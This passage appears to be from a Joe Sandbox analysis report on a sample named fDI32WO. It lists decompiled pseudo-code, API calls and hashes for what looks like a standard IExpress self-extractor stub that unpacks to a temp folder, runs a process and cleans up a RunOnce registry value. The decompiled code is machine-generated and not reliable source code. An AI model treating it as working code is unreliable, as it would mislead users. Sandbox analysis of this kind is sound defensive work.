                                                                                                                                                                                                                                              0x00a84091
                                                                                                                                                                                                                                              0x00a8409c
                                                                                                                                                                                                                                              0x00a840a8
                                                                                                                                                                                                                                              0x00a840b8
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a840c2
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a840c2

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?,?,?,00000000), ref: 00A84033
                                                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00A84049
                                                                                                                                                                                                                                              • GetExitCodeProcess.KERNELBASE ref: 00A8405C
                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 00A8409C
                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 00A840A8
                                                                                                                                                                                                                                              • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 00A840DC
                                                                                                                                                                                                                                              • FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 00A840E9
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.406290316.0000000000A81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406258413.0000000000A80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406326237.0000000000A88000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_a80000_fDI32WO.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CloseHandleProcess$CodeCreateErrorExitFormatLastMessageObjectSingleWait
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3183975587-0
                                                                                                                                                                                                                                              • Opcode ID: ced5d338c841f3a211bdb824f32c02e09c748bc0a548bd0b6e677fcb97175ba5
                                                                                                                                                                                                                                              • Instruction ID: 23cac4d61fe4f014bdb09813c79e9e17397290a4004c2071179897915ba79f91
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ced5d338c841f3a211bdb824f32c02e09c748bc0a548bd0b6e677fcb97175ba5
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D931C831640218ABEB20EFA5DC4DFBBBB7CEB98701F1002AAF505D1161CA344D86CF11
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 652 a851e5-a8520b call a8468f LocalAlloc 655 a8522d-a8523c call a8468f 652->655 656 a8520d-a85228 call a844b9 call a86285 652->656 662 a8523e-a85260 call a844b9 LocalFree 655->662 663 a85262-a85270 lstrcmpA 655->663 671 a852b0 656->671 662->671 664 a8527e-a8529c call a844b9 LocalFree 663->664 665 a85272-a85273 LocalFree 663->665 674 a8529e-a852a4 664->674 675 a852a6 664->675 669 a85279-a8527c 665->669 672 a852b2-a852b5 669->672 671->672 674->669 675->671
                                                                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                                                                              			E00A851E5(void* __eflags) {
                                                                                                                                                                                                                                              				int _t5;
                                                                                                                                                                                                                                              				void* _t6;
                                                                                                                                                                                                                                              				void* _t28;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t1 = E00A8468F("UPROMPT", 0, 0) + 1; // 0x1
                                                                                                                                                                                                                                              				_t28 = LocalAlloc(0x40, _t1);
                                                                                                                                                                                                                                              				if(_t28 != 0) {
                                                                                                                                                                                                                                              					if(E00A8468F("UPROMPT", _t28, _t29) != 0) {
                                                                                                                                                                                                                                              						_t5 = lstrcmpA(_t28, "<None>"); // executed
                                                                                                                                                                                                                                              						if(_t5 != 0) {
                                                                                                                                                                                                                                              							_t6 = E00A844B9(0, 0x3e9, _t28, 0, 0x20, 4);
                                                                                                                                                                                                                                              							LocalFree(_t28);
                                                                                                                                                                                                                                              							if(_t6 != 6) {
                                                                                                                                                                                                                                              								 *0xa89124 = 0x800704c7;
                                                                                                                                                                                                                                              								L10:
                                                                                                                                                                                                                                              								return 0;
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              							 *0xa89124 = 0;
                                                                                                                                                                                                                                              							L6:
                                                                                                                                                                                                                                              							return 1;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						LocalFree(_t28);
                                                                                                                                                                                                                                              						goto L6;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					E00A844B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                              					LocalFree(_t28);
                                                                                                                                                                                                                                              					 *0xa89124 = 0x80070714;
                                                                                                                                                                                                                                              					goto L10;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				E00A844B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                              				 *0xa89124 = E00A86285();
                                                                                                                                                                                                                                              				goto L10;
                                                                                                                                                                                                                                              			}






                                                                                                                                                                                                                                              0x00a851fb
                                                                                                                                                                                                                                              0x00a85207
                                                                                                                                                                                                                                              0x00a8520b
                                                                                                                                                                                                                                              0x00a8523c
                                                                                                                                                                                                                                              0x00a85268
                                                                                                                                                                                                                                              0x00a85270
                                                                                                                                                                                                                                              0x00a8528b
                                                                                                                                                                                                                                              0x00a85293
                                                                                                                                                                                                                                              0x00a8529c
                                                                                                                                                                                                                                              0x00a852a6
                                                                                                                                                                                                                                              0x00a852b0
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a852b0
                                                                                                                                                                                                                                              0x00a8529e
                                                                                                                                                                                                                                              0x00a85279
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a8527b
                                                                                                                                                                                                                                              0x00a85273
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a85273
                                                                                                                                                                                                                                              0x00a8524a
                                                                                                                                                                                                                                              0x00a85250
                                                                                                                                                                                                                                              0x00a85256
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a85256
                                                                                                                                                                                                                                              0x00a85219
                                                                                                                                                                                                                                              0x00a85223
                                                                                                                                                                                                                                              0x00000000

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 00A8468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A846A0
                                                                                                                                                                                                                                                • Part of subcall function 00A8468F: SizeofResource.KERNEL32(00000000,00000000,?,00A82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A846A9
                                                                                                                                                                                                                                                • Part of subcall function 00A8468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A846C3
                                                                                                                                                                                                                                                • Part of subcall function 00A8468F: LoadResource.KERNEL32(00000000,00000000,?,00A82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A846CC
                                                                                                                                                                                                                                                • Part of subcall function 00A8468F: LockResource.KERNEL32(00000000,?,00A82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A846D3
                                                                                                                                                                                                                                                • Part of subcall function 00A8468F: memcpy_s.MSVCRT ref: 00A846E5
                                                                                                                                                                                                                                                • Part of subcall function 00A8468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00A846EF
                                                                                                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00A82F4D,?,00000002,00000000), ref: 00A85201
                                                                                                                                                                                                                                              • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 00A85250
                                                                                                                                                                                                                                                • Part of subcall function 00A844B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00A84518
                                                                                                                                                                                                                                                • Part of subcall function 00A844B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00A84554
                                                                                                                                                                                                                                                • Part of subcall function 00A86285: GetLastError.KERNEL32(00A85BBC), ref: 00A86285
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.406290316.0000000000A81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406258413.0000000000A80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406326237.0000000000A88000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_a80000_fDI32WO.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Resource$FindFreeLoadLocal$AllocErrorLastLockMessageSizeofStringmemcpy_s
                                                                                                                                                                                                                                              • String ID: <None>$UPROMPT
                                                                                                                                                                                                                                              • API String ID: 957408736-2980973527
                                                                                                                                                                                                                                              • Opcode ID: eaf3fa8323b74dc6b379e569ead816556f148b24265d797066efe0f71071e5e7
                                                                                                                                                                                                                                              • Instruction ID: 5387a5c2c4680eb1e9e0a3742990280edf42d0e0cc0ce81f3c2ecbc239b57da8
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: eaf3fa8323b74dc6b379e569ead816556f148b24265d797066efe0f71071e5e7
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 711108B1A00601ABE354BBF15D89F7B61EDEB98350F104439FA02D5190FF789C024325
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 74%
                                                                                                                                                                                                                                              			E00A852B6(void* __ebx, char* __ecx, void* __edi, void* __esi) {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				char _v268;
                                                                                                                                                                                                                                              				signed int _t9;
                                                                                                                                                                                                                                              				signed int _t11;
                                                                                                                                                                                                                                              				void* _t21;
                                                                                                                                                                                                                                              				void* _t29;
                                                                                                                                                                                                                                              				CHAR** _t31;
                                                                                                                                                                                                                                              				void* _t32;
                                                                                                                                                                                                                                              				signed int _t33;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t28 = __edi;
                                                                                                                                                                                                                                              				_t22 = __ecx;
                                                                                                                                                                                                                                              				_t21 = __ebx;
                                                                                                                                                                                                                                              				_t9 =  *0xa88004; // 0xd891196d
                                                                                                                                                                                                                                              				_v8 = _t9 ^ _t33;
                                                                                                                                                                                                                                              				_push(__esi);
                                                                                                                                                                                                                                              				_t31 =  *0xa891e0; // 0x808e20
                                                                                                                                                                                                                                              				if(_t31 != 0) {
                                                                                                                                                                                                                                              					_push(__edi);
                                                                                                                                                                                                                                              					do {
                                                                                                                                                                                                                                              						_t29 = _t31;
                                                                                                                                                                                                                                              						if( *0xa88a24 == 0 &&  *0xa89a30 == 0) {
                                                                                                                                                                                                                                              							SetFileAttributesA( *_t31, 0x80); // executed
                                                                                                                                                                                                                                              							DeleteFileA( *_t31); // executed
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_t31 = _t31[1];
                                                                                                                                                                                                                                              						LocalFree( *_t29);
                                                                                                                                                                                                                                              						LocalFree(_t29);
                                                                                                                                                                                                                                              					} while (_t31 != 0);
                                                                                                                                                                                                                                              					_pop(_t28);
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_t11 =  *0xa88a20; // 0x0
                                                                                                                                                                                                                                              				_pop(_t32);
                                                                                                                                                                                                                                              				if(_t11 != 0 &&  *0xa88a24 == 0 &&  *0xa89a30 == 0) {
                                                                                                                                                                                                                                              					_push(_t22);
                                                                                                                                                                                                                                              					E00A81781( &_v268, 0x104, _t22, "C:\Users\jones\AppData\Local\Temp\IXP002.TMP\");
                                                                                                                                                                                                                                              					if(( *0xa89a34 & 0x00000020) != 0) {
                                                                                                                                                                                                                                              						E00A865E8( &_v268);
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					SetCurrentDirectoryA(".."); // executed
                                                                                                                                                                                                                                              					_t22 =  &_v268;
                                                                                                                                                                                                                                              					E00A82390( &_v268);
                                                                                                                                                                                                                                              					_t11 =  *0xa88a20; // 0x0
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				if( *0xa89a40 != 1 && _t11 != 0) {
                                                                                                                                                                                                                                              					_t11 = E00A81FE1(_t22); // executed
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				 *0xa88a20 =  *0xa88a20 & 0x00000000;
                                                                                                                                                                                                                                              				return E00A86CE0(_t11, _t21, _v8 ^ _t33, 0x104, _t28, _t32);
                                                                                                                                                                                                                                              			}












                                                                                                                                                                                                                                              0x00a852b6
                                                                                                                                                                                                                                              0x00a852b6
                                                                                                                                                                                                                                              0x00a852b6
                                                                                                                                                                                                                                              0x00a852c1
                                                                                                                                                                                                                                              0x00a852c8
                                                                                                                                                                                                                                              0x00a852cb
                                                                                                                                                                                                                                              0x00a852cc
                                                                                                                                                                                                                                              0x00a852d4
                                                                                                                                                                                                                                              0x00a852d6
                                                                                                                                                                                                                                              0x00a852d7
                                                                                                                                                                                                                                              0x00a852de
                                                                                                                                                                                                                                              0x00a852e0
                                                                                                                                                                                                                                              0x00a852f2
                                                                                                                                                                                                                                              0x00a852fa
                                                                                                                                                                                                                                              0x00a852fa
                                                                                                                                                                                                                                              0x00a85302
                                                                                                                                                                                                                                              0x00a85305
                                                                                                                                                                                                                                              0x00a8530c
                                                                                                                                                                                                                                              0x00a85312
                                                                                                                                                                                                                                              0x00a85316
                                                                                                                                                                                                                                              0x00a85316
                                                                                                                                                                                                                                              0x00a85317
                                                                                                                                                                                                                                              0x00a8531c
                                                                                                                                                                                                                                              0x00a8531f
                                                                                                                                                                                                                                              0x00a85333
                                                                                                                                                                                                                                              0x00a85345
                                                                                                                                                                                                                                              0x00a85351
                                                                                                                                                                                                                                              0x00a85359
                                                                                                                                                                                                                                              0x00a85359
                                                                                                                                                                                                                                              0x00a85363
                                                                                                                                                                                                                                              0x00a85369
                                                                                                                                                                                                                                              0x00a8536f
                                                                                                                                                                                                                                              0x00a85374
                                                                                                                                                                                                                                              0x00a85374
                                                                                                                                                                                                                                              0x00a85381
                                                                                                                                                                                                                                              0x00a85387
                                                                                                                                                                                                                                              0x00a85387
                                                                                                                                                                                                                                              0x00a8538f
                                                                                                                                                                                                                                              0x00a853a0

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • SetFileAttributesA.KERNELBASE(00808E20,00000080,?,00000000), ref: 00A852F2
                                                                                                                                                                                                                                              • DeleteFileA.KERNELBASE(00808E20), ref: 00A852FA
                                                                                                                                                                                                                                              • LocalFree.KERNEL32(00808E20,?,00000000), ref: 00A85305
                                                                                                                                                                                                                                              • LocalFree.KERNEL32(00808E20), ref: 00A8530C
                                                                                                                                                                                                                                              • SetCurrentDirectoryA.KERNELBASE(00A811FC,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\), ref: 00A85363
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              • C:\Users\user\AppData\Local\Temp\IXP002.TMP\, xrefs: 00A85334
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.406290316.0000000000A81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406258413.0000000000A80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406326237.0000000000A88000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_a80000_fDI32WO.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: FileFreeLocal$AttributesCurrentDeleteDirectory
                                                                                                                                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\
                                                                                                                                                                                                                                              • API String ID: 2833751637-1610346413
                                                                                                                                                                                                                                              • Opcode ID: 307f6df30e46c1129b8d5cc928dd59e109caaba677f333e42d55132a4374503d
                                                                                                                                                                                                                                              • Instruction ID: fe582ad9e108368094c82af26601fbc291c08a0ca6c32c6bd669d29f78bb12bf
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 307f6df30e46c1129b8d5cc928dd59e109caaba677f333e42d55132a4374503d
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9221C331D10604DBDB28FBA0DD59B6AB7B4FB10790F48015AE8425A1A0CFB45C87CB41
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                                                                              			E00A81FE1(void* __ecx) {
                                                                                                                                                                                                                                              				void* _v8;
                                                                                                                                                                                                                                              				long _t4;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				if( *0xa88530 != 0) {
                                                                                                                                                                                                                                              					_t4 = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x20006,  &_v8); // executed
                                                                                                                                                                                                                                              					if(_t4 == 0) {
                                                                                                                                                                                                                                              						RegDeleteValueA(_v8, "wextract_cleanup2"); // executed
                                                                                                                                                                                                                                              						return RegCloseKey(_v8);
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				return _t4;
                                                                                                                                                                                                                                              			}





                                                                                                                                                                                                                                              0x00a81fee
                                                                                                                                                                                                                                              0x00a82005
                                                                                                                                                                                                                                              0x00a8200d
                                                                                                                                                                                                                                              0x00a82017
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a82020
                                                                                                                                                                                                                                              0x00a8200d
                                                                                                                                                                                                                                              0x00a82029

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • RegOpenKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00020006,00A8538C,?,?,00A8538C), ref: 00A82005
                                                                                                                                                                                                                                              • RegDeleteValueA.KERNELBASE(00A8538C,wextract_cleanup2,?,?,00A8538C), ref: 00A82017
                                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(00A8538C,?,?,00A8538C), ref: 00A82020
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.406290316.0000000000A81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406258413.0000000000A80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406326237.0000000000A88000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_a80000_fDI32WO.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CloseDeleteOpenValue
                                                                                                                                                                                                                                              • String ID: Software\Microsoft\Windows\CurrentVersion\RunOnce$wextract_cleanup2
                                                                                                                                                                                                                                              • API String ID: 849931509-3354236729
                                                                                                                                                                                                                                              • Opcode ID: b79a07b13a9806e7076605cf4245146a9cf8df9987119b996383efed85c544fb
                                                                                                                                                                                                                                              • Instruction ID: 6bf923768595cf4fd0482085f7499c648cd719a45e08afb415bd51fd3953bf5f
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b79a07b13a9806e7076605cf4245146a9cf8df9987119b996383efed85c544fb
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FFE04F30A50318BBE722EBD0EC0AF697B79F711741F600195B905A0060EF655E15D705
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 94%
                                                                                                                                                                                                                                              			E00A84CD0(char* __edx, long _a4, int _a8) {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				char _v268;
                                                                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                                                              				signed int _t29;
                                                                                                                                                                                                                                              				int _t30;
                                                                                                                                                                                                                                              				long _t32;
                                                                                                                                                                                                                                              				signed int _t33;
                                                                                                                                                                                                                                              				long _t35;
                                                                                                                                                                                                                                              				long _t36;
                                                                                                                                                                                                                                              				struct HWND__* _t37;
                                                                                                                                                                                                                                              				long _t38;
                                                                                                                                                                                                                                              				long _t39;
                                                                                                                                                                                                                                              				long _t41;
                                                                                                                                                                                                                                              				long _t44;
                                                                                                                                                                                                                                              				long _t45;
                                                                                                                                                                                                                                              				long _t46;
                                                                                                                                                                                                                                              				signed int _t50;
                                                                                                                                                                                                                                              				long _t51;
                                                                                                                                                                                                                                              				char* _t58;
                                                                                                                                                                                                                                              				long _t59;
                                                                                                                                                                                                                                              				char* _t63;
                                                                                                                                                                                                                                              				long _t64;
                                                                                                                                                                                                                                              				CHAR* _t71;
                                                                                                                                                                                                                                              				CHAR* _t74;
                                                                                                                                                                                                                                              				int _t75;
                                                                                                                                                                                                                                              				signed int _t76;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t69 = __edx;
                                                                                                                                                                                                                                              				_t29 =  *0xa88004; // 0xd891196d
                                                                                                                                                                                                                                              				_t30 = _t29 ^ _t76;
                                                                                                                                                                                                                                              				_v8 = _t30;
                                                                                                                                                                                                                                              				_t75 = _a8;
                                                                                                                                                                                                                                              				if( *0xa891d8 == 0) {
                                                                                                                                                                                                                                              					_t32 = _a4;
                                                                                                                                                                                                                                              					__eflags = _t32;
                                                                                                                                                                                                                                              					if(_t32 == 0) {
                                                                                                                                                                                                                                              						_t33 = E00A84E99(_t75);
                                                                                                                                                                                                                                              						L35:
                                                                                                                                                                                                                                              						return E00A86CE0(_t33, _t54, _v8 ^ _t76, _t69, _t73, _t75);
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					_t35 = _t32 - 1;
                                                                                                                                                                                                                                              					__eflags = _t35;
                                                                                                                                                                                                                                              					if(_t35 == 0) {
                                                                                                                                                                                                                                              						L9:
                                                                                                                                                                                                                                              						_t33 = 0;
                                                                                                                                                                                                                                              						goto L35;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					_t36 = _t35 - 1;
                                                                                                                                                                                                                                              					__eflags = _t36;
                                                                                                                                                                                                                                              					if(_t36 == 0) {
                                                                                                                                                                                                                                              						_t37 =  *0xa88584; // 0x0
                                                                                                                                                                                                                                              						__eflags = _t37;
                                                                                                                                                                                                                                              						if(_t37 != 0) {
                                                                                                                                                                                                                                              							SetDlgItemTextA(_t37, 0x837,  *(_t75 + 4));
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_t54 = 0xa891e4;
                                                                                                                                                                                                                                              						_t58 = 0xa891e4;
                                                                                                                                                                                                                                              						do {
                                                                                                                                                                                                                                              							_t38 =  *_t58;
                                                                                                                                                                                                                                              							_t58 =  &(_t58[1]);
                                                                                                                                                                                                                                              							__eflags = _t38;
                                                                                                                                                                                                                                              						} while (_t38 != 0);
                                                                                                                                                                                                                                              						_t59 = _t58 - 0xa891e5;
                                                                                                                                                                                                                                              						__eflags = _t59;
                                                                                                                                                                                                                                              						_t71 =  *(_t75 + 4);
                                                                                                                                                                                                                                              						_t73 =  &(_t71[1]);
                                                                                                                                                                                                                                              						do {
                                                                                                                                                                                                                                              							_t39 =  *_t71;
                                                                                                                                                                                                                                              							_t71 =  &(_t71[1]);
                                                                                                                                                                                                                                              							__eflags = _t39;
                                                                                                                                                                                                                                              						} while (_t39 != 0);
                                                                                                                                                                                                                                              						_t69 = _t71 - _t73;
                                                                                                                                                                                                                                              						_t30 = _t59 + 1 + _t71 - _t73;
                                                                                                                                                                                                                                              						__eflags = _t30 - 0x104;
                                                                                                                                                                                                                                              						if(_t30 >= 0x104) {
                                                                                                                                                                                                                                              							L3:
                                                                                                                                                                                                                                              							_t33 = _t30 | 0xffffffff;
                                                                                                                                                                                                                                              							goto L35;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_t69 = 0xa891e4;
                                                                                                                                                                                                                                              						_t30 = E00A84702( &_v268, 0xa891e4,  *(_t75 + 4));
                                                                                                                                                                                                                                              						__eflags = _t30;
                                                                                                                                                                                                                                              						if(__eflags == 0) {
                                                                                                                                                                                                                                              							goto L3;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_t41 = E00A8476D( &_v268, __eflags);
                                                                                                                                                                                                                                              						__eflags = _t41;
                                                                                                                                                                                                                                              						if(_t41 == 0) {
                                                                                                                                                                                                                                              							goto L9;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_push(0x180);
                                                                                                                                                                                                                                              						_t30 = E00A84980( &_v268, 0x8302); // executed
                                                                                                                                                                                                                                              						_t75 = _t30;
                                                                                                                                                                                                                                              						__eflags = _t75 - 0xffffffff;
                                                                                                                                                                                                                                              						if(_t75 == 0xffffffff) {
                                                                                                                                                                                                                                              							goto L3;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_t30 = E00A847E0( &_v268);
                                                                                                                                                                                                                                              						__eflags = _t30;
                                                                                                                                                                                                                                              						if(_t30 == 0) {
                                                                                                                                                                                                                                              							goto L3;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						 *0xa893f4 =  *0xa893f4 + 1;
                                                                                                                                                                                                                                              						_t33 = _t75;
                                                                                                                                                                                                                                              						goto L35;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					_t44 = _t36 - 1;
                                                                                                                                                                                                                                              					__eflags = _t44;
                                                                                                                                                                                                                                              					if(_t44 == 0) {
                                                                                                                                                                                                                                              						_t54 = 0xa891e4;
                                                                                                                                                                                                                                              						_t63 = 0xa891e4;
                                                                                                                                                                                                                                              						do {
                                                                                                                                                                                                                                              							_t45 =  *_t63;
                                                                                                                                                                                                                                              							_t63 =  &(_t63[1]);
                                                                                                                                                                                                                                              							__eflags = _t45;
                                                                                                                                                                                                                                              						} while (_t45 != 0);
                                                                                                                                                                                                                                              						_t74 =  *(_t75 + 4);
                                                                                                                                                                                                                                              						_t64 = _t63 - 0xa891e5;
                                                                                                                                                                                                                                              						__eflags = _t64;
                                                                                                                                                                                                                                              						_t69 =  &(_t74[1]);
                                                                                                                                                                                                                                              						do {
                                                                                                                                                                                                                                              							_t46 =  *_t74;
                                                                                                                                                                                                                                              							_t74 =  &(_t74[1]);
                                                                                                                                                                                                                                              							__eflags = _t46;
                                                                                                                                                                                                                                              						} while (_t46 != 0);
                                                                                                                                                                                                                                              						_t73 = _t74 - _t69;
                                                                                                                                                                                                                                              						_t30 = _t64 + 1 + _t74 - _t69;
                                                                                                                                                                                                                                              						__eflags = _t30 - 0x104;
                                                                                                                                                                                                                                              						if(_t30 >= 0x104) {
                                                                                                                                                                                                                                              							goto L3;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_t69 = 0xa891e4;
                                                                                                                                                                                                                                              						_t30 = E00A84702( &_v268, 0xa891e4,  *(_t75 + 4));
                                                                                                                                                                                                                                              						__eflags = _t30;
                                                                                                                                                                                                                                              						if(_t30 == 0) {
                                                                                                                                                                                                                                              							goto L3;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_t69 =  *((intOrPtr*)(_t75 + 0x18));
                                                                                                                                                                                                                                              						_t30 = E00A84C37( *((intOrPtr*)(_t75 + 0x14)),  *((intOrPtr*)(_t75 + 0x18)),  *(_t75 + 0x1a) & 0x0000ffff); // executed
                                                                                                                                                                                                                                              						__eflags = _t30;
                                                                                                                                                                                                                                              						if(_t30 == 0) {
                                                                                                                                                                                                                                              							goto L3;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						E00A84B60( *((intOrPtr*)(_t75 + 0x14))); // executed
                                                                                                                                                                                                                                              						_t50 =  *(_t75 + 0x1c) & 0x0000ffff;
